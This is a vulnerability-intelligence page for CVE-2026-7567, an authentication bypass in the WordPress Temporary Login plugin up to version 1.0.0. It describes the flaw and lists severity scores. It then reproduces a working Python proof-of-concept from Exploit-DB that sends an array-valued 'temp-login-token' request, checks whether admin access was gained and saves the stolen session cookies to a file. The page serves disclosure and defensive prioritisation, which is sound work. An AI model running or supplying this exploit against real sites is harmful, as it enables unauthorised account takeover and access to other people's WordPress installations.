VIR Vulnerability Intelligence Relay

CVE-2026-7567

critical
Published 2026-05-01 ยท Modified 2026-05-01
๐Ÿ’ฌ Discuss on Community โœš Propose mitigation
CVSS v3
9.8
CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
CVSS v4 NEW
โ€”
not yet in upstream
VIR risk
10.0

Description

The Temporary Login plugin for WordPress is vulnerable to Authentication Bypass in versions up to and including 1.0.0. This is due to improper input validation in the maybe_login_temporary_user() function, which fails to verify that the 'temp-login-token' GET parameter is a scalar string before processing it. When the parameter is supplied as an array, PHP's empty() check is bypassed and sanitize_key() returns an empty string, which is then passed as the meta_value to get_users(). WordPress ignores an empty meta_value and returns all users matching the meta_key '_temporary_login_token', allowing authentication without a valid token. This makes it possible for unauthenticated attackers to authenticate as any active temporary login user by sending a single crafted GET request.

Predictions

Exploit likelihood
97%
Patch ETA
โ€”

Heuristic predictions, AS-IS, for prioritization only.

Mitigations

No mitigations published for this CVE yet.

The vendor-content worker queues fetches as references arrive (check back in a few minutes). Or โ€” if you've already worked around this in production โ€” publish your fix to the community-verified tier.

โœš Propose a mitigation on Community โ†’ Mitigations published via the community go through AI scoring + 2 human reviewers + 7-day silent objection window before landing here with source_tier=community-verified.

Exploits

Public proof-of-concept code below. AS-IS, for defenders and authorised testing only.

Exploit-DB

EDB-52575 webapps multiple python ยท 2 KB
Amir Hossein Jamshidi ยท 2026-05-26

Wordpress Temporary Login Plugin 1.0.0 - 'temp-login-token' Authentication Bypass to Account Takeover

python exploit Source: Exploit-DB 
# Exploit Title: Wordpress Temporary Login Plugin  1.0.0 - 'temp-login-token' Authentication Bypass to Account Takeover
# Date: 2026-05-02
# Exploit Author: Amir Hossein Jamshidi
# Vendor Homepage: https://wordpress.org
# Software Link: https://downloads.wordpress.org/plugin/temporary-login.1.0.0.zip
# Version: <= 1.0.0
# Tested on: Linux
# CVE : CVE-2026-7567


#!/usr/bin/env python3
import requests

print('''
#################################################################################
#  Temporary Login Plugin <= 1.0.0 - 'temp-login-token' Authentication Bypass   #
#                   BY: Amir Hossein Jamshidi                                   #
#               Mail: amirhosseinjamshidi64@gmail.com                           #
#           github: https://github.com/amirhosseinjamshidi64                    #
#                    Usage: python Exploit.py                                   #
#################################################################################
''')

# Target URL - CHANGE THIS to your WordPress URL
target = input("Enter Target (example: https://evil.com/): ")
url = target + "wp-admin/?temp-login-token[]"
print("[*] Sending exploit request...")
response = requests.get(url, allow_redirects=True)

print(f"[*] Final URL: {response.url}")
print(f"[*] Response status: {response.status_code}")

# Check if we got admin cookies
if 'wp-settings-time' in str(response.cookies):
    print("[โœ“] SUCCESS! Authentication bypassed!")
    print("[โœ“] WordPress logged-in cookie found")
    # Try to access admin area with the same session
    admin_check = requests.get(
        response.url.replace('wp-login.php', 'wp-admin/'),
        cookies=response.cookies
    )
    if 'Dashboard' in admin_check.text or 'wp-admin' in admin_check.url:
        print("[โœ“] Full admin access confirmed!")
        print("[โœ“] You are now logged in as a temporary user")
    else:
        print("[!] Logged in but no admin access (user may have limited role)")
else:
    print("[-] Exploit failed. Reasons:")
    print("    - Plugin not installed or not version 1.0.0")
    print("    - No temporary users exist")
    print("    - Plugin is patched")
# Save cookies for manual browsing
with open('wordpress_cookies.txt', 'w') as f:
    for cookie in response.cookies:
        f.write(f"{cookie.name}={cookie.value}\n")
print("[*] Cookies saved to wordpress_cookies.txt")

References

CWEs

CWE-288

Community-verified mitigations for this CVE will appear above when contributors publish them.

Verify integrity in audit chain (admin only). AS-IS.